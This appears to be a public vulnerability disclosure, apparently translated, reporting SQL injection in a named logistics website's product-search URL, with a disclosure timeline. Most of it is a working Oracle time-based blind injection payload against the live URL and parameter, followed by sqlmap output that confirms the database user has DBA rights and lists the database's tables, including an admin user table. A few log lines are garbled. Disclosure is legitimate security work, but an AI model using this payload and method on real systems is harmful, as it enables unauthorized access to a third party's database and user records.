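2015-10-22: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-12-06: The vendor has actively ignored the vulnerability; details are disclosed to the public
www.huozhan.com, the world's largest trade logistics platform!
Injection point: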
http://www.huozhan.com/SupplierItemCate_searchProductList.do?SUPPLIER_CODE=010375&AREA_CODE=010BJ
Place: GET
Parameter: AREA_CODE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: SUPPLIER_CODE=010375&AREA_CODE=010BJ' AND 2609=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(112)||CHR(87)||CHR(84),5) AND 'uZrB'='uZrB
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: SUPPLIER_CODE, type: Single quoted string (default)
[1] place: GET, parameter: AREA_CODE, type: Single quoted string
[q] Quit
>
[11:16:40] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[11:16:40] [INFO] fetching current user
[11:16:40] [INFO] retrieved:
[11:16:40] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[11:16:56] [INFO] adjusting time delay to 4 seconds due to good response times
HUOZHAN
current user: 'HUOZHAN'

web application technology: Nginx, JSP
back-end DBMS: Oracle
[11:22:08] [INFO] testing if current user is DBA
[11:22:08] [WARNING] time-based comparison needs larger stg a few dummy requests, please wait..
[11:22:20] [WARNING] it is very important not to stress thndwidth during usage of time-based queries
1
current user is DBA: 'True'
Sensitive information leaked
Current database
[12 tables]
+---------------------+
| ALL_USERS           |
| TABLE_PRIVILEGE_MAP |
| admin_user          |
| article             |
| auth                |
| city                |
| dictionary          |
| inventory           |
| store               |
| supplier            |
| user_types          |
| zl_deeds            |
+---------------------+
By the looks of it this vendor is not registered; no dump operation was performed
admin_user ALL_USERS user_types
Unable to contact the vendor, or the vendor actively refused